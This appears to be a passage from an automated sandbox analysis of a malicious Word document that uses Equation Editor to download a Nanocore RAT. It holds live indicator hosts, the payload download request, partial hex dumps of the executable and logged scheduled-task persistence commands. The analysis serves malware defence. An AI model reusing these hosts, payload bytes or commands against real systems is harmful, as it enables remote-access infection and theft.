Sep 14, 2021 13:17:17.313028097 CEST	192.168.2.22	8.8.8.8	0x13f5	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)
Sep 14, 2021 13:17:58.081119061 CEST	192.168.2.22	8.8.8.8	0x8113	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)
Sep 14, 2021 13:18:15.957704067 CEST	192.168.2.22	8.8.8.8	0x2190	Standard query (0)	blackbladeinc52.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Sep 14, 2021 13:16:21.654107094 CEST	8.8.8.8	192.168.2.22	0x9983	No error (0)	lg-tv.tk	185.239.243.112	A (IP address)	IN (0x0001)
Sep 14, 2021 13:16:34.038151026 CEST	8.8.8.8	192.168.2.22	0x3fc0	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)
Sep 14, 2021 13:16:52.173284054 CEST	8.8.8.8	192.168.2.22	0x501	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)
Sep 14, 2021 13:17:17.311537981 CEST	8.8.8.8	192.168.2.22	0x13f5	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)
Sep 14, 2021 13:17:17.348654985 CEST	8.8.8.8	192.168.2.22	0x13f5	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)
Sep 14, 2021 13:17:58.118311882 CEST	8.8.8.8	192.168.2.22	0x8113	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)
Sep 14, 2021 13:18:15.990187883 CEST	8.8.8.8	192.168.2.22	0x2190	No error (0)	blackbladeinc52.ddns.net	31.210.20.61	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

lg-tv.tk

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	185.239.243.112	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 13:16:21.700583935 CEST	0	OUT	GET /plugmanzx.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: lg-tv.tk Connection: Keep-Alive
Sep 14, 2021 13:16:21.730138063 CEST	2	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Sep 2021 11:16:21 GMT Content-Type: application/x-msdownload Content-Length: 530432 Last-Modified: Tue, 14 Sep 2021 00:28:19 GMT Connection: keep-alive ETag: "613feca3-81800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 ea 3f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 08 00 00 08 00 00 00 00 00 00 62 2d 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 08 00 4f 00 00 00 00 40 08 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 0d 08 00 00 20 00 00 00 0e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 08 00 00 06 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 16 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 64 00 00 a8 e3 01 00 03 00 00 00 32 00 00 06 48 48 02 00 c8 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 50 00 00 00 01 00 00 11 02 28 14 00 00 0a 00 00 02 1f 0a 1f 0a 73 15 00 00 0a 7d 01 00 00 04 16 0a 2b 2b 00 16 0b 2b 18 00 02 7b 01 00 00 04 06 07 73 16 00 00 0a 28 17 00 00 0a 00 07 17 58 0b 07 1f 0a fe 04 0c 08 2d df 00 06 17 58 0a 06 1f 0a fe 04 0d 09 2d cc 2a 13 30 01 00 0c 00 00 00 02 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 01 00 00 04 2a 00 00 1b 30 04 00 a0 00 00 00 03 00 00 11 00 03 1f 09 30 0f 03 16 32 0b 04 1f 09 30 06 04 16 fe 04 2b 01 17 0a 06 2c 13 00 1f 0f 1f 0f 72 01 00 00 70 1f 0f 28 2e 00 00 06 00 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 6f 19 00 00 0a 16 fe 03 0b 07 2c 15 00 1f 0f 1f 0f 72 3f 00 00 70 1f 0f 28 2e 00 00 06 00 00 2b 44 00 00 05 6f 1a 00 00 0a 0c 2b 1e 12 02 28 1b 00 00 0a 0d 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 09 6f 1c 00 00 0a 00 00 12 02 28 1d 00 00 0a 2d d9 de 0f 12 02 fe 16 03 00 00 1b 6f 1e 00 00 0a 00 dc 00 2a 01 10 00 00 02 00 64 00 2b 8f 00 0f 00 00 00 00 13 30 03 00 22 01 00 00 04 00 00 11 00 7e 33 00 00 04 16 fe 01 0a 06 39 11 01 00 00 00 16 0b 7e 34 00 00 04 16 19 6f 1f 00 00 0a 0c 16 0d 2b 1f 00 16 13 04 2b 08 00 00 11 04 17 58 13 04 11 04 1f 0a fe 04 13 05 11 05 2d ec 00 09 17 58 0d 09 1f 0a fe 04 13 06 11 06 2d d6 07 2d 06 08 16 fe 01 2b 01 16 13 07 11 07 2c 34 00 16 13 08 2b 21 00 16 13 09 2b 08 00 00 11 09 17 58 13 09 11 09 1f 0a fe 04 13 0a 11 0a 2d ec 00 11 08 17 58 13 08 11 08 1f 0a fe 04 13 0b 11 0b 2d d3 00 07 2d 06 08 17 fe 01 2b 01 16 13 0c 11 0c 2c 34 00 16 13 0d 2b Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL%?a0b- @@ @-O@` H.textp `.rsrc@@@.reloc`@BD-Hd2HH0P(s}+++{s(X-X-0{+&}0020+,rp(.((o,r?p(.+Do+(((o(-od+0"~39~4o++X-X--+,4+!+X-X--+,4+
Sep 14, 2021 13:16:21.730185032 CEST	3	IN	Data Raw: 21 00 16 13 0e 2b 08 00 00 11 0e 17 58 13 0e 11 0e 1f 0a fe 04 13 0f 11 0f 2d ec 00 11 0d 17 58 13 0d 11 0d 1f 0a fe 04 13 10 11 10 2d d3 00 07 2d 06 08 18 fe 01 2b 01 16 13 11 11 11 2c 34 00 16 13 12 2b 21 00 16 13 13 2b 08 00 00 11 13 17 58 13 Data Ascii: !+X-X--+,4+!+X-X-3**00#202020+,rp(.8~((o,ru
Sep 14, 2021 13:16:21.730218887 CEST	4	IN	Data Raw: 2a 03 00 70 6f 33 00 00 0a 00 02 7b 15 00 00 04 72 2a 03 00 70 6f 33 00 00 0a 00 02 7b 13 00 00 04 72 2a 03 00 70 6f 33 00 00 0a 00 02 7b 11 00 00 04 72 2a 03 00 70 6f 33 00 00 0a 00 02 7b 0f 00 00 04 72 2a 03 00 70 6f 33 00 00 0a 00 02 7b 0d 00 Data Ascii: po3{rpo3{rpo3{rpo3{rpo3{rpo30o7&,.{o8,+^{o9(+Fo7(,8{o8{o1Y,+{o:(
Sep 14, 2021 13:16:21.730251074 CEST	6	IN	Data Raw: 52 00 00 0a 6f 3e 00 00 0a 72 cf 06 00 70 1c 6f 3f 00 00 0a 02 7b 11 00 00 04 6f 53 00 00 0a 6f 46 00 00 0a 00 02 7b 05 00 00 04 6f 52 00 00 0a 6f 3e 00 00 0a 72 e1 06 00 70 1e 6f 3f 00 00 0a 02 7b 0f 00 00 04 6f 53 00 00 0a 6f 46 00 00 0a 00 02 Data Ascii: Ro>rpo?{oSoF{oRo>rpo?{oSoF{oRo>rpo?{oSoF{oRo>rpo?{o*o+o@{oOoCoDoEoF{o;{oRoG
Sep 14, 2021 13:16:21.730326891 CEST	7	IN	Data Raw: 00 00 00 5c 02 00 00 ad 02 00 00 1e 00 00 00 26 00 00 01 02 00 00 00 51 00 00 00 7c 02 00 00 cd 02 00 00 0f 00 00 00 00 00 00 00 3e 00 02 7b 23 00 00 04 16 6f 4b 00 00 0a 00 2a 1b 30 06 00 85 01 00 00 0e 00 00 11 00 73 5c 00 00 0a 25 72 a8 08 00 Data Ascii: \&Q\|>{#oK*0s\%rprpo]%rprpo]%rprpo]%rprpo]%rprpo]%rprpo]%rprpo]%rprpo]{C%rp%{
Sep 14, 2021 13:16:21.730360031 CEST	9	IN	Data Raw: 00 00 04 02 73 7e 00 00 0a 7d 1e 00 00 04 02 73 7d 00 00 0a 7d 20 00 00 04 02 73 7d 00 00 0a 7d 21 00 00 04 02 73 7d 00 00 0a 7d 22 00 00 04 02 73 7d 00 00 0a 7d 23 00 00 04 02 73 7c 00 00 0a 7d 24 00 00 04 02 73 7c 00 00 0a 7d 25 00 00 04 02 73 Data Ascii: s~}s}} s}}!s}}"s}}#s\|}$s\|}%s}}&s}}'s}(so}){s}s}+s}-{o{o{o({o{o{o
Sep 14, 2021 13:16:21.730391979 CEST	10	IN	Data Raw: 00 04 1f 1b 1f 7f 73 88 00 00 0a 6f 89 00 00 0a 00 02 7b 12 00 00 04 72 75 0c 00 70 6f 8a 00 00 0a 00 02 7b 12 00 00 04 1f 24 1f 0d 73 8c 00 00 0a 6f 8d 00 00 0a 00 02 7b 12 00 00 04 1f 09 6f 8e 00 00 0a 00 02 7b 12 00 00 04 72 83 0c 00 70 6f 33 Data Ascii: so{rupo{$so{o{rpo3{Cbso{rpo{dso{o{o{!eso{rpo{so{o
Sep 14, 2021 13:16:21.730420113 CEST	11	IN	Data Raw: f7 0d 00 70 6f 8a 00 00 0a 00 02 7b 1c 00 00 04 1f 27 1f 0d 73 8c 00 00 0a 6f 8d 00 00 0a 00 02 7b 1c 00 00 04 18 6f 8e 00 00 0a 00 02 7b 1c 00 00 04 72 05 0e 00 70 6f 33 00 00 0a 00 02 7b 1d 00 00 04 1d 1f 7b 73 88 00 00 0a 6f 89 00 00 0a 00 02 Data Ascii: po{'so{o{rpo3{{so{rpo{yso{o{o{o%rp%rp%rp%rp%rp%rp%rpo{,so
Sep 14, 2021 13:16:21.730490923 CEST	13	IN	Data Raw: 27 00 00 04 17 6f 94 00 00 0a 00 02 7b 27 00 00 04 02 fe 06 1d 00 00 06 73 95 00 00 0a 6f 96 00 00 0a 00 02 7b 28 00 00 04 17 6f 97 00 00 0a 00 02 7b 28 00 00 04 6f 9c 00 00 0a 1c 8d 0f 00 00 01 25 16 72 c6 04 00 70 a2 25 17 72 d6 04 00 70 a2 25 Data Ascii: 'o{'so{(o{(o%rp%rp%rp%rp%rp%rpo{( & 9so{(rhpo{( ^so{(o{(so{*oid%
Sep 14, 2021 13:16:21.730534077 CEST	14	IN	Data Raw: 11 00 02 7b 32 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 32 00 00 04 2a 00 00 13 30 04 00 5f 02 00 00 17 00 00 11 00 16 28 be 00 00 0a 00 12 00 fe 15 06 00 00 02 12 00 18 7d 2e 00 00 04 12 00 18 7d 2f 00 00 04 12 00 72 32 a0 01 70 7d 31 00 00 04 12 Data Ascii: {2+&}20_(}.}/r2p}1}0r6p(.rJp(.r`p(.rp(.8(9(+(&(-{/,]((,}/r
Sep 14, 2021 13:16:21.759104013 CEST	16	IN	Data Raw: 00 00 00 38 40 01 00 00 06 7b 2f 00 00 04 1c fe 01 13 0a 11 0a 2c 5d 00 12 02 28 c1 00 00 0a 1f 28 fe 01 13 0b 11 0b 2c 1b 00 12 00 1e 7d 2f 00 00 04 18 1c 72 8f 01 00 70 1f 0f 28 2e 00 00 06 00 00 2b 2a 12 02 28 c1 00 00 0a 1f 26 fe 01 13 0c 11 Data Ascii: 8@{/,]((,}/rp(.+(&,}/rp(.8{/,[((,}/rp(.+(&,}/rp(.+j{/,Z(

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 2008 Parent PID: 596

General

Start time:	13:16:16
Start date:	14/09/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f370000
File size:	1423704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2576 Parent PID: 596

General

Start time:	13:16:17
Start date:	14/09/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: plugmangd5693.exe PID: 1580 Parent PID: 2576

General

Start time:	13:16:18
Start date:	14/09/2021
Path:	C:\Users\user\AppData\Roaming\plugmangd5693.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\plugmangd5693.exe
Imagebase:	0x330000
File size:	530432 bytes
MD5 hash:	19665F929613C0E945FF13DD25C9362E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.425366710.000000000228E000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2244 Parent PID: 1580

General

Start time:	13:16:25
Start date:	14/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\RWbqWnnjDWI' /XML 'C:\Users\user\AppData\Local\Temp\tmp3709.tmp'
Imagebase:	0xd10000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 1292 Parent PID: 1580

General

Start time:	13:16:26
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0x1120000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2996 Parent PID: 1580

General

Start time:	13:16:26
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0x1120000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 2560 Parent PID: 2996

General

Start time:	13:16:28
Start date:	14/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3FEE.tmp'
Imagebase:	0x380000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 1516 Parent PID: 2996

General

Start time:	13:16:29
Start date:	14/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp2DF5.tmp'
Imagebase:	0xf10000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskeng.exe PID: 2212 Parent PID: 896

General

Start time:	13:16:29
Start date:	14/09/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xffdd0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: RegSvcs.exe PID: 2960 Parent PID: 2212

General

Start time:	13:16:30
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
Imagebase:	0x1120000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Analysis Process: smtpsvc.exe PID: 2128 Parent PID: 2212

General

Start time:	13:16:31
Start date:	14/09/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0x11b0000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs

Chronological Activities

Analysis Process: smtpsvc.exe PID: 2664 Parent PID: 1764

General

Start time:	13:16:39
Start date:	14/09/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x1b0000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: plugmangd5693.exe PID: 1580 Parent PID: 2576 plugmangd5693.exeCOMMON

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	7.4%
Total number of Nodes:	94
Total number of Limit Nodes:	5

Executed Functions

Function 006F0200, Relevance: 5.5, Strings: 2, Instructions: 2991
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v-r, xrefs: 006F023B
Lq, xrefs: 006F02D1

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: Lq$v-r
API String ID: 0-1539239321
Opcode ID: d1b30c8879f3a959b0743e100e48ccde53db26b80e55836207ac73a581aadace
Instruction ID: 4b406d1e41a3acb40164d6f94bdc7e902c8956430a3be3e2489c240a873ad055
Opcode Fuzzy Hash: d1b30c8879f3a959b0743e100e48ccde53db26b80e55836207ac73a581aadace
Instruction Fuzzy Hash: 9A63E434A113198FD765EB24C894AE9B3B6FF8A300F5081E9E4097B391DB71AE85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 01D01DC3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D01E43

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: b7ce2c4b9c07a227d8bc8c0e75d2bb77e0071d48b39bfa1fad1de7ea8308884b
Instruction ID: a4a68a83bed1db06bd9fb9db04cba253315cf1a967136475333c88c3d4f2435b
Opcode Fuzzy Hash: b7ce2c4b9c07a227d8bc8c0e75d2bb77e0071d48b39bfa1fad1de7ea8308884b
Instruction Fuzzy Hash: CA21B2765097809FEB238F29DC44B56BFF4EF06310F0885EAE9858B5A3D271D908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 006FE88A, Relevance: 1.6, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

Actx , xrefs: 006FEA86

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: f8cde406c09f76950b346a7be41497a56d564e90ffc146dfd49c2113691b77cf
Instruction ID: 05d8e26ab35401ead1bed395000034bbc42bd729abe0226f0583e3ba454e5947
Opcode Fuzzy Hash: f8cde406c09f76950b346a7be41497a56d564e90ffc146dfd49c2113691b77cf
Instruction Fuzzy Hash: A0D13670D0620CDFDB44CFA4D991AEDBBB6FB49310F20A46AE516BB290D7369941CF18

Uniqueness

Uniqueness Score: -1.00%

Function 01D01E90, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D01F05

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: ba027027d5be1d9a1f99e87a8c9ac82bbe00cef0e724cde435b39929db234b56
Instruction ID: c8e31fc29287a88e48ffa579e407d30275d086b01aef4458fea0264eafd68ae2
Opcode Fuzzy Hash: ba027027d5be1d9a1f99e87a8c9ac82bbe00cef0e724cde435b39929db234b56
Instruction Fuzzy Hash: 2821CD725097C09FEB128B24DC55AA2BFB0EF07324F0D84DAE9844F263D271A908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D01DFA, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01D01E43

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 72e1f0c34e0112af20cec59e3ea5ef86fa92fe5733015c37937f37f298249f73
Instruction ID: d8740f08bb1a7d30f66dd073c4d970cc759e0ce1fa744a5234cb98e62397d2e8
Opcode Fuzzy Hash: 72e1f0c34e0112af20cec59e3ea5ef86fa92fe5733015c37937f37f298249f73
Instruction Fuzzy Hash: 3B1182365003009FEB21CF59D884B6AFBE4EF08720F08C5AAED498B652D371E854DB61

Uniqueness

Uniqueness Score: -1.00%

Function 01D01ECA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01D01F05

Memory Dump Source

Source File: 00000004.00000002.425180211.0000000001D00000.00000040.00000001.sdmp, Offset: 01D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d00000_plugmangd5693.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 7913a7006972db70fca33d3ec7d69c1d07b57a4bafae4bc080b9935fcd452447
Instruction ID: e996f4fca09963d92b4f476b0b1e2c0930f951b7469862242a020390b45b2a3a
Opcode Fuzzy Hash: 7913a7006972db70fca33d3ec7d69c1d07b57a4bafae4bc080b9935fcd452447
Instruction Fuzzy Hash: BB018B324003409FEB22CF49D884B65FFA0EB48720F08C4AEED890B692D371E458DB62

Uniqueness

Uniqueness Score: -1.00%

Function 006FB2B8, Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

t>\C, xrefs: 006FB541

Memory Dump Source

Source File: 00000004.00000002.425075887.00000000006F0000.00000040.00000001.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_plugmangd5693.jbxd

Similarity

API ID:
String ID: t>\C
API String ID: 0-305603135
Opcode ID: 1c193928134161b6375c9281838e31513f17a0dbcb5686b76149129e871cc8ae
Instruction ID: 2f1f2858b8c78a9123a0d8360e7f009f11c7ef5e49803e207074d95a4ff81bb4
